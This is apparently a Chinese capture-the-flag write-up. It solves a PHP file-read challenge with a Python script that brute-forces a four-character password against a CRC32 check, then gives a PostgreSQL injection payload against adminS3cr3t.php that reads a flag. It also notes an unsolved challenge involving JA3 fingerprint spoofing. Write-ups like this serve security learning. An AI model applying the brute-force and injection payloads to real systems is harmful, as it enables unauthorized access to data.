前言
我怎么就想不到呢。。
fake_php_authentication(复现)
crc32爆破 + psql注入
给了个文件读取的功能,但是需要四位密码
随便传个?filename=index.php&passwd=1,返回
1-index.php
crc32 check has failed! 0a3e55f9!=8e1d53c6,try again!
you are not admin!其中0a3e55f9是1-index.phpcrc32加密后的值,看来是要满足crc32的校验,但是8e1d53c6又是什么鬼,我不造啊
于是寄了
爆破admin密码
import binascii
list=''
for i in range(32,128):
list+=chr(i)
file = "-index.php"
dic = list
crc = 0x8e1d53c6
for i in dic :
for j in dic:
for p in dic:
for t in dic:
s=i+j+p+t+file
s_bytes = s.encode()
if crc == (binascii.crc32(s_bytes) & 0xffffffff):
print(s)可以得到s!@#
然后可以用这个密码去读取index.php admin.php adminS3cr3t.php
在adminS3cr3t.php中存在psql注入
/adminS3cr3t.php?secret=$$f$$||$$l$$||$$a$$||$$g$$&column=u%26"\0066\006c\0061\0067",u%26"\006e\0061\
006d\0065"OnlyYou(Unsolved)
api documentation for this program is /api?token=???? But it's protected by a 4-digit password and please use chromehint:JA3指纹
你说得对但是怎么我伪造了半天ua头都不是chrome